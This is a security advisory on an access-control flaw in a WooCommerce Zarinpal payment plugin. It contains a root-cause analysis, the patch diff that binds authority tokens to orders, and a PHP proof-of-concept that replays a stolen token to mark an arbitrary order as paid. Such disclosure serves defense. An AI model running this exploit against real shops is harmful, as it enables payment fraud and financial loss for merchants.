Atomic Edge analysis of CVE-2026-2592:
This vulnerability is an improper access control flaw in the Zarinpal Gateway for WooCommerce WordPress plugin, versions up to and including 5.0.16. The flaw allows unauthenticated attackers to manipulate the payment status of WooCommerce orders, potentially marking them as paid without a valid transaction. The CVSS score of 7.7 reflects a high-severity integrity and availability impact.
Atomic Edge research identifies the root cause in the `Return_from_ZarinPal_Gateway` callback handler within the file `zarinpal-woocommerce-payment-gateway/class-wc-gateway-zarinpal.php`. The vulnerable code, prior to line 384, processes the callback by checking the `Status` and `Authority` GET parameters. The handler fails to verify that the provided `Authority` token is specifically associated with the order ID also present in the request. This missing validation allows an authority token from one transaction to be replayed against a different order of the same amount.
The exploitation method involves an unauthenticated attacker intercepting or predicting a valid `Authority` token from a legitimate payment flow. The attacker then crafts a request to the plugin’s public callback endpoint, typically triggered by a user return from the gateway, with the target order ID and the stolen authority token. The attack vector is a GET request containing the parameters `Status=OK` and `Authority={stolen_token}`. The order ID is likely passed via the `order_id` parameter or derived from the session, as the callback handler retrieves the order object without verifying token ownership.
The patch in version 5.0.17 introduces a multi-step validation mechanism. The fix adds logic to store a history of authority tokens for each order in a new `_zarinpal_authority_history` meta field. During callback processing, the code now checks if the submitted `Authority` value matches either the current `_zarinpal_authority` meta value or any value in the stored history array. If no match is found, the request is rejected, an error note is added to the order, and the user is redirected. This ensures the authority token is bound to the specific order instance.
Successful exploitation directly impacts store revenue and order fulfillment integrity. Attackers can cause financial loss by marking arbitrary orders as ‘paid’ without an actual funds transfer. This can lead to goods or services being dispatched without payment, inventory discrepancies, and administrative confusion. The attack requires no authentication and can be performed remotely, making it a significant business logic flaw.
--- a/zarinpal-woocommerce-payment-gateway/class-wc-gateway-zarinpal.php
+++ b/zarinpal-woocommerce-payment-gateway/class-wc-gateway-zarinpal.php
@@ -356,7 +356,15 @@
$cart_json,
$referrer_id
);
+
$order->update_meta_data('_zarinpal_authority', $authority);
+ $authority_history = $order->get_meta('_zarinpal_authority_history');
+ if (!is_array($authority_history)) {
+ $authority_history = array();
+ }
+ $authority_history[] = $authority;
+ $order->update_meta_data('_zarinpal_authority_history', $authority_history);
+
$order->save();
$note = sprintf(__('کاربر به درگاه پرداخت هدایت شد. شناسه تراکنش: %s', WC_ZPAL_TEXT_DOMAIN), $authority);
$order->add_order_note($note);
@@ -376,9 +384,33 @@
wp_redirect(wc_get_checkout_url());
exit;
}
+
+ if ($order->is_paid()) {
+ wp_redirect($this->get_return_url($order));
+ exit;
+ }
+
if (isset($_GET['Status']) && $_GET['Status'] === 'OK') {
$authority = sanitize_text_field($_GET['Authority']);
-
+ $stored_authority = $order->get_meta('_zarinpal_authority');
+ $authority_history = $order->get_meta('_zarinpal_authority_history');
+ $is_valid_authority = false;
+
+ if (!empty($stored_authority) && $authority === $stored_authority) {
+ $is_valid_authority = true;
+ }
+
+ if (!$is_valid_authority && is_array($authority_history) && in_array($authority, $authority_history, true)) {
+ $is_valid_authority = true;
+ }
+
+ if (!$is_valid_authority) {
+ $order->add_order_note(__('تلاش برای پرداخت با توکن نامعتبر. توکن ارسالی با توکن سفارش مطابقت ندارد.', WC_ZPAL_TEXT_DOMAIN));
+ wc_add_notice(__('توکن پرداخت نامعتبر است. لطفاً مجدداً تلاش کنید.', WC_ZPAL_TEXT_DOMAIN), 'error');
+ wp_redirect(wc_get_checkout_url());
+ exit;
+ }
+
$order_total = $order->get_total();
$amount = intval($order_total);
$currency = $order->get_currency();
--- a/zarinpal-woocommerce-payment-gateway/index.php
+++ b/zarinpal-woocommerce-payment-gateway/index.php
@@ -1,7 +1,7 @@
<?php
/*
Plugin Name: افزونه پرداخت امن زرینپال برای ووکامرس
-Version: 5.0.16
+Version: 5.0.17
Description: افزونه درگاه پرداخت امن زرینپال برای فروشگاه ساز ووکامرس
Plugin URI: https://zarinpal.com
Author: Masoud Amini, Armin Zahedi
@@ -9,7 +9,7 @@
Text Domain: wc-zpal
Domain Path: /languages
WC requires at least: 3.0
-WC tested up to: 9.4.1
+WC tested up to: 9.5
Requires at least: 5.8
Tested up to: 6.7.1
License: GPLv3 or later
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2592 - Zarinpal Gateway for WooCommerce <= 5.0.16 - Improper Access Control to Payment Status Update
<?php
// CONFIGURATION
$target_url = 'https://victim-site.com/'; // Base URL of the target WordPress site
$stolen_authority = 'A0000000000000000000000000000000'; // Valid authority token captured from a different transaction
$target_order_id = 123; // The order ID the attacker wants to mark as paid
// The callback endpoint is typically accessed when a user returns from the gateway.
// The exact URL pattern may vary; common patterns include the checkout page or a specific endpoint.
// This PoC assumes the order ID is passed via a GET parameter, as is common in WooCommerce payment returns.
$callback_url = $target_url . '?wc-api=WC_Gateway_Zarinpal&order_id=' . $target_order_id . '&Status=OK&Authority=' . urlencode($stolen_authority);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $callback_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow redirects to see final response
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only
// Execute the request to trigger the vulnerable callback handler
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
echo "HTTP Response Code: $http_coden";
echo "Response Body (first 500 chars):n" . substr($response, 0, 500) . "n";
// A successful exploit may redirect to a 'thank you' page or show an order confirmation.
// In the vulnerable version, the order status would be updated to 'processing' or 'completed'.
?>
